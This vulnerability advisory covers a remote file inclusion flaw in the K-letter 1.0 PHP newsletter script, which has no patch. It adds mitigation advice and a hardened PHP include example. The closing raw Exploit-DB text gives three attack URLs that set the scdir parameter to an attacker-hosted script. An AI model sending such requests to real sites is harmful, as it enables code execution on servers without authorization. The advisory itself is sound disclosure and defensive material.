Vendor: K-letter
By: Cyber-warrior.org
CVSS: 7.5 (HIGH)
CWE: Remote File Include
Product Name: K-letter
Affected Version From: K-letter 1.0
Affected Version To: K-letter 1.0
Patch Exists: NO
Platforms Tested: Unknown

K-letter 1.0 Remote File include

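The K-letter 1.0 script is vulnerable to remote file inclusion. Its action.php, subs.php and unsubs.php scripts build the path of an include from the scdir variable, which can be set through the request URL. An attacker can exploit this by pointing the include at a malicious script hosted on a remote server, which can lead to arbitrary code execution on the target system.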

Mitigation:

To mitigate this vulnerability, it is recommended to sanitize user input and validate file paths before including them in the code. Additionally, restricting file inclusion to specific directories can help prevent unauthorized access to sensitive files.
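
A hardened form of the include quoted in the advisory below, as an added example that is not K-letter's own code or a vendor patch. It assumes PHP 7.1 or later and that the script sits in the application root; the helper name safe_include_path is hypothetical.

```php
<?php
// Added example, not K-letter's own code. Hardened replacement for
//   include $scdir."admin/config.inc.php";
// Assumption: the script lives in the application root, so the base
// directory comes from __DIR__ and never from request data.

/**
 * Resolve a file under a trusted base directory and return its real path,
 * or null if it is missing or resolves outside the base.
 * (safe_include_path is a hypothetical helper name.)
 */
function safe_include_path(string $baseDir, string $relative): ?string
{
    // Reject URL schemes and stream wrappers (http:, ftp:, php:, data:).
    if (preg_match('#^[a-z][a-z0-9+.\-]*:#i', $relative)) {
        return null;
    }
    $base = realpath($baseDir);
    if ($base === false) {
        return null;
    }
    // realpath() collapses "..", symlinks and duplicate separators.
    $target = realpath($base . DIRECTORY_SEPARATOR . $relative);
    if ($target === false || !is_file($target)) {
        return null;
    }
    // The resolved path must still sit inside the base directory.
    $prefix = rtrim($base, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    if (strncmp($target, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $target;
}

// Fixed server-side value: not read from $_GET, $_POST, $_COOKIE or globals.
$scdir = __DIR__;

$config = safe_include_path($scdir, 'admin/config.inc.php');
if ($config === null) {
    http_response_code(500);
    exit('Configuration file not found.');
}
require $config;
```

Keeping allow_url_include set to Off in php.ini (the default since PHP 5.2) adds a second layer by refusing URLs in include and require.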

Exploit-DB raw data:

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+   K-letter 1.0 << Remote File include                             +
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+   DownloadScript: http://www.scripts.com.ua/download.php?ID=813   +
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+   Cyber-warrior.org <<< GIANT of the virtual world.               +
+                                                                   +
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+   ERROR [1];  action.php?                                         +
+              include ($scdir."admin/config.inc.php");             +
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+   BUG                                                             +
+   www.target.com/path/action.php?scdir=[3vil script]              +
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+   ERROR [2];  subs.php?                                           +
+              include $scdir."admin/config.inc.php";               +
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+   BUG                                                             +
+   www.target.com/path/subs.php?scdir=[3vil script]                +
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+   ERROR [3];  unsubs.php?                                         +
+              include $scdir."admin/config.inc.php";               +
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+   BUG                                                             +
+   www.target.com/path/unsubs.php?scdir=[3vil script]              +
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+DORK:(                                                             +
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
++++++++++CYBER-SECURITY+++++++++++++++++++++++++++++++++++++++++++++
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

# milw0rm.com [2007-06-05]